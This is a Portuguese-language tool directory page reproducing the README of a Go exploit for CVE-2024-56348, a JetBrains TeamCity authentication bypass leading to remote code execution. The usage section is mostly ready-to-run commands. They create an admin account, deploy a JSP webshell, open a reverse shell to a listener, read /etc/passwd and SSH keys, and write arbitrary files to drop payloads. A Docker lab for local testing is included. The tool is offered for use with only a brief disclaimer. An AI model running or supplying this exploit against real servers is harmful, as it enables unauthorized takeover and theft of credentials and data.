Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/joshuavanderpoll/cve-2024-56348
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoRed TeamingFerramenta de Acesso Remoto
GitHubjoshuavanderpoll/cve-2024-56348

cve-2024-56348

Exploit baseado em Go para CVE-2024-56348 que visa a bypass de autenticação e execução remota de código no JetBrains TeamCity. Oferece shell interativo, reverse shell, leitura/gravação de arquivos e execução de comandos individuais sem credenciais.

Ver RepositórioSite
23há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Bypass de Autenticação do JetBrains TeamCity + RCE (CVE-2024-56348) PoC

Go

📜 Descrição

CVE-2024-56348 é uma vulnerabilidade crítica de bypass de autenticação no JetBrains TeamCity on-premises que afeta todas as versões anteriores à 2024.12. A API REST lida incorretamente com requisições para caminhos contendo ;.jsp, permitindo que um atacante não autenticado invoque qualquer endpoint REST como se estivesse totalmente autenticado.

Este exploit combina o bypass com a própria API REST do TeamCity para criar uma conta SYSTEM_ADMIN, gerar um token de API e obter execução remota de código completa — seja através do endpoint de debug embutido ou de um webshell de plugin JSP carregado dinamicamente. Nenhuma credencial é necessária.

Versões afetadas: JetBrains TeamCity on-premises < 2024.12

✨ Funcionalidades

  • Shell interativo — pseudo-shell com separação de stdout/stderr e código de saída no prompt
  • Execução de comando — comando único via -command com saída completa de stdout, stderr e código de saída
  • Shell reverso — implanta um webshell de plugin JSP e aciona um callback para o seu listener
  • Leitura de arquivo — lê qualquer arquivo que o processo TeamCity possa acessar
  • Escrita de arquivo — grava conteúdo arbitrário em qualquer caminho gravável no servidor

🛠️ Instalação

root@kitploit:~
git clone https://github.com/joshuavanderpoll/cve-2024-56348.git
cd CVE-2024-56348
go build -o exp cve-2024-56348.go

Instalar diretamente com Go

root@kitploit:~
go install github.com/joshuavanderpoll/cve-2024-56348@latest

Executar sem instalar

root@kitploit:~
go run github.com/joshuavanderpoll/cve-2024-56348@latest -t http://127.0.0.1:8111

⚙️ Uso

root@kitploit:~
  -t          URL alvo (ex: http://127.0.0.1:8111)
  -command    Executa um único comando e imprime a saída
  -shell      Gera um shell reverso (requer -lhost e -lport)
  -lhost      Host do listener para o shell reverso
  -lport      Porta do listener para o shell reverso
  -read-file  Lê um arquivo remoto e imprime seu conteúdo
  -write-file Caminho remoto para escrever (requer -file-content)
  -file-content Conteúdo a ser escrito ao usar -write-file

A ausência de flags de ação entra automaticamente em um shell interativo.


Verificação de vulnerabilidade + shell interativo

Conecta ao alvo, confirma o bypass, cria uma conta de administrador temporária e entra em um shell interativo. O prompt mostra o código de saída do último comando em verde (sucesso) ou vermelho (diferente de zero).

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111

Shell interativo


Execução de comando único

Executa um comando e imprime stdout, stderr e código de saída separadamente.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -command "id"

Execução de comando


Shell reverso

Implanta o webshell de plugin JSP e aciona um shell reverso de volta para o seu listener. Inicie nc -lvp 4444 primeiro.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -shell -lhost 10.0.0.1 -lport 4444

Shell reverso


Leitura de arquivo

Lê qualquer arquivo que o processo TeamCity possa acessar — útil para arquivos de configuração, chaves SSH, etc.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -read-file /etc/passwd

Leitura de arquivo


Escrita de arquivo

Escreve conteúdo arbitrário em um caminho remoto. Útil para soltar cargas adicionais ou modificar configurações.

root@kitploit:~
./cve-2024-56348 -t http://127.0.0.1:8111 -write-file /tmp/readme.txt -file-content "LEAVE ME HERE"

Escrita de arquivo


🐋 PoC com Docker

Um ambiente Docker Compose autocontido com uma instância vulnerável do TeamCity para testes locais. Veja DOCKER.md para mais detalhes

root@kitploit:~
cd docker/
docker compose up -d
./cve-2024-56348 -t http://127.0.0.1:8111

Se o script retornar "[-] Plugin upload failed." tente fazer login com o usuário hackindex e tente novamente. (as credenciais podem ser encontradas em DOCKER.md)

🕵🏼 Referências

  • Aviso de Segurança da JetBrains — CVE-2024-56348
  • NVD — CVE-2024-56348
  • HackIndex

📢 Aviso Legal

Esta ferramenta é fornecida apenas para fins educacionais e de pesquisa. O criador não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta.

Baixar ferramenta